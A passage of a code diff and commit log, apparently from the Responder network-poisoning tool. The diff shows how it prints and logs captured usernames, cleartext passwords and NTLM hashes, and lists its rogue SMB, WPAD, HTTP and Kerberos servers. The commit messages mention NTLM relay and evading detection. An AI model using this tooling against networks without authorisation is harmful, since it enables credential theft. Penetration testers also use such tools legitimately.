+
 		if len(result['hostname']):
 			print text("[%s] %s Hostname : %s" % (result['module'], result['type'], color(result['hostname'], 3)))
-                        textlogging("[%s] %s Hostname : %s" % (result['module'], result['type'], result['hostname']))
+
 		if len(result['user']):
 			print text("[%s] %s Username : %s" % (result['module'], result['type'], color(result['user'], 3)))
-                        textlogging("[%s] %s Username : %s" % (result['module'], result['type'], result['user']))
+
 		# Bu order of priority, print cleartext, fullhash, or hash
 		if len(result['cleartext']):
 			print text("[%s] %s Password : %s" % (result['module'], result['type'], color(result['cleartext'], 3)))
-                        textlogging("[%s] %s Password : %s" % (result['module'], result['type'], result['cleartext']))
+
 		elif len(result['fullhash']):
 			print text("[%s] %s Hash     : %s" % (result['module'], result['type'], color(result['fullhash'], 3)))
-                        textlogging("[%s] %s Hash     : %s" % (result['module'], result['type'], result['fullhash']))
+
 		elif len(result['hash']):
 			print text("[%s] %s Hash     : %s" % (result['module'], result['type'], color(result['hash'], 3)))
-                        textlogging("[%s] %s Hash     : %s" % (result['module'], result['type'], result['hash']))
+
 		# Appending auto-ignore list if required
 		# Except if this is a machine account's hash
 		if settings.Config.AutoIgnore and not result['user'].endswith('$'):
 			settings.Config.AutoIgnoreList.append(result['client'])
 			print color('[*] Adding client %s to auto-ignore list' % result['client'], 4, 1)
 	else:
-		print color('[*]', 3, 1), 'Skipping previously captured hash for %s' % result['user']
+		print color('[*] Skipping previously captured hash for %s' % result['user'], 3, 1)
 		text('[*] Skipping previously captured hash for %s' % result['user'])
 		cursor.execute("UPDATE responder SET timestamp=datetime('now') WHERE user=? AND client=?", (result['user'], result['client']))
 		cursor.commit()
 	cursor.close()
@@ -262,6 +281,7 @@ def StartupMessage():
 	print '    %-27s' % "HTTP server" + (enabled if settings.Config.HTTP_On_Off else disabled)
 	print '    %-27s' % "HTTPS server" + (enabled if settings.Config.SSL_On_Off else disabled)
 	print '    %-27s' % "WPAD proxy" + (enabled if settings.Config.WPAD_On_Off else disabled)
 	print '    %-27s' % "Auth proxy" + (enabled if settings.Config.ProxyAuth_On_Off else disabled)
 	print '    %-27s' % "SMB server" + (enabled if settings.Config.SMB_On_Off else disabled)
 	print '    %-27s' % "Kerberos server" + (enabled if settings.Config.Krb_On_Off else disabled)
 	print '    %-27s' % "SQL server" + (enabled if settings.Config.SQL_On_Off else disabled)
@@ -306,40 +326,3 @@ def StartupMessage():
 		print '    %-27s' % "Don't Respond To Names" + color(str(settings.Config.DontRespondToName), 5, 1)
 	print "\n\n"
 # Useful for debugging
 def hexdump(src, l=0x16):
 	res = []
 	sep = '.'
 	src = str(src)
 	for i in range(0, len(src), l):
 		s = src[i:i+l]
 		hexa = ''
 		for h in range(0,len(s)):
 			if h == l/2:
 				hexa += ' '
 			h = s[h]
 			if not isinstance(h, int):
 				h = ord(h)
 			h = hex(h).replace('0x','')
 			if len(h) == 1:
 				h = '0'+h
 			hexa += h + ' '
 		hexa = hexa.strip(' ')
 		text = ''
 		for c in s:
 			if not isinstance(c, int):
 				c = ord(c)
 			if 0x20 <= c < 0x7F:
 				text += chr(c)
 			else:
 				text += sep
 		res.append(('%08X:  %-'+str(l*(2+1)+1)+'s  |%s|') % (i, hexa, text))
 	return '\n'.join(res)
Author	SHA1	Message	Date
lgandx	196eded194	Minor fixes	2016-10-04 21:28:24 -03:00
lgandx	3d3a19f66b	Using Trans pipes instead of read/writes & fixed low priv bug which drops you in a shell while the user has no rights	2016-10-04 21:19:08 -03:00
lgandx	48936d8953	updated version number	2016-10-02 23:47:10 -03:00
lgandx	cd09e19a93	Added logs folder.	2016-10-02 23:41:00 -03:00
lgandx	5d83778ac7	Removed logs folder.	2016-10-02 23:39:25 -03:00
lgandx	ab67070a2b	Added: Cross-protocol NTLMv1-2 relay (beta).	2016-10-02 23:34:47 -03:00
lgandx	5f1fa4a00f	Minor fix	2016-09-21 13:37:46 -03:00
lgandx	bfe57d28ac	updated version	2016-09-12 00:03:06 -03:00
lgandx	2cdeef3c83	minor bug fix	2016-09-12 00:01:27 -03:00
lgandx	92c9191bda	Config dumped independently. Responder-Session.log is now a clean file.	2016-09-11 23:03:50 -03:00
lgandx	35d933d596	Added new option in Responder.conf. Capture multiple hashes from the same client. Default is On.	2016-09-11 22:33:00 -03:00
lgandx	fb69f14f69	Reflected recent changes.	2016-09-11 21:59:50 -03:00
lgandx	3e2e375987	removed debug info	2016-09-11 21:55:37 -03:00
lgandx	ad9ce6e659	Added support for webdav, auto credz.	2016-09-11 21:51:57 -03:00
lgandx	04c270f6b7	Added option -e, specify an external IP address to redirect poisoned traffic to.	2016-09-11 20:25:10 -03:00
lgandx	29ad8a0816	Firefox blacklisted on WPAD since it doesn't honors fail-over proxies. Added SO_LINGER to send RST when close() is called.	2016-09-11 13:07:44 -03:00
lgandx	23151fee42	minor fix	2016-09-10 21:31:58 -03:00
lgandx	82fe64dfd9	Added proxy auth server + various fixes and improvements	2016-09-10 21:25:55 -03:00
lgandx	c3372d9bb6	bug: removed loop, while connection handled by basehttpserver	2016-09-10 12:17:47 -03:00
lgandx	881dae59cf	Removed useless HTTP headers	2016-09-10 10:53:15 -03:00
lgandx	ecd62c322f	Added current date for all HTTP headers, avoiding easy detection	2016-09-10 10:50:01 -03:00
lgandx	1d99ab648f	Minor fix	2016-09-09 10:03:20 -03:00